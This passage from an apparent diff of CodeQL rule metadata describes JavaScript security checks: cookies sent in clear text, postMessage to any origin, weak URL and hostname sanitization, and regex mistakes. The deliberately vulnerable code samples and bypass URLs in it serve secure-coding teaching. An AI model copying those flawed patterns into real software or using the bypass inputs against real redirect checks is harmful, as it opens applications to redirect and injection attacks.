"6.0" + } + }, { + "id" : "js/clear-text-cookie", + "name" : "js/clear-text-cookie", + "shortDescription" : { + "text" : "Clear text transmission of sensitive cookie" + }, + "fullDescription" : { + "text" : "Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an attacker." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n", + "markdown" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-614", "external/cwe/cwe-311", "external/cwe/cwe-312", "external/cwe/cwe-319" ], + "description" : "Sending sensitive information in a cookie without requring SSL encryption\n can expose the cookie to an attacker.", + "id" : "js/clear-text-cookie", + "kind" : "problem", + "name" : "Clear text transmission of sensitive cookie", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/cross-window-information-leak", + "name" : "js/cross-window-information-leak", + "shortDescription" : { + "text" : "Cross-window communication with unrestricted target origin" + }, + "fullDescription" : { + "text" : "When sending sensitive information to another window using `postMessage`, the origin of the target window should be restricted to avoid unintentional information leaks." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. 
If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. 
If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-201", "external/cwe/cwe-359" ], + "description" : "When sending sensitive information to another window using `postMessage`,\n the origin of the target window should be restricted to avoid unintentional\n information leaks.", + "id" : "js/cross-window-information-leak", + "kind" : "path-problem", + "name" : "Cross-window communication with unrestricted target origin", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "4.3" + } + }, { + "id" : "js/incomplete-url-substring-sanitization", + "name" : "js/incomplete-url-substring-sanitization", + "shortDescription" : { + "text" : "Incomplete URL substring sanitization" + }, + "fullDescription" : { + "text" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. 
Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. 
Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. 
Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. 
Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing.", + "id" : "js/incomplete-url-substring-sanitization", + "kind" : "problem", + "name" : "Incomplete URL substring sanitization", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incomplete-hostname-regexp", + "name" : "js/incomplete-hostname-regexp", + "shortDescription" : { + "text" : "Incomplete regular expression for hostnames" + }, + "fullDescription" : { + "text" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. 
Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. 
Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part 
of the hostname might match more hostnames than expected.", + "id" : "js/incomplete-hostname-regexp", + "kind" : "problem", + "name" : "Incomplete regular expression for hostnames", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incorrect-suffix-check", + "name" : "js/incorrect-suffix-check", + "shortDescription" : { + "text" : "Incorrect suffix check" + }, + "fullDescription" : { + "text" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. 
This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. 
This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "security", "correctness", "external/cwe/cwe-020" ], + "description" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled.", + "id" : "js/incorrect-suffix-check", + "kind" : "problem", + "name" : "Incorrect suffix check", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/useless-regexp-character-escape", + "name" : "js/useless-regexp-character-escape", + "shortDescription" : { + "text" : "Useless regular-expression character escape" + }, + "fullDescription" : { + "text" : "Prepending a backslash to an ordinary character in a string does not have any effect, and may make regular expressions constructed from this string behave unexpectedly." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. 
In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. 
Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. 
Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Prepending a backslash to an ordinary character in a string\n does not have any effect, and may make regular expressions constructed from this string\n behave unexpectedly.", + "id" : "js/useless-regexp-character-escape", + "kind" : "problem", + "name" : "Useless regular-expression character escape", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/overly-large-range", + "name" : "js/overly-large-range", + "shortDescription" : { + "text" : "Overly permissive regular expression range" + }, + "fullDescription" : { + "text" : "Overly permissive regular expression ranges match a wider range of characters than intended. This may allow an attacker to bypass a filter or sanitizer." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. 
It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. 
It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Overly permissive regular expression ranges match a wider range of characters than intended.\n This may allow an attacker to bypass a filter or sanitizer.", + "id" : "js/overly-large-range", + "kind" : "problem", + "name" : "Overly permissive regular expression range", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/incomplete-url-scheme-check", + "name" : "js/incomplete-url-scheme-check", + "shortDescription" : { + "text" : "Incomplete URL scheme check" + }, + "fullDescription" : { + "text" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\" and \"data:\" suggests a logic error or even a security vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. 
While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: 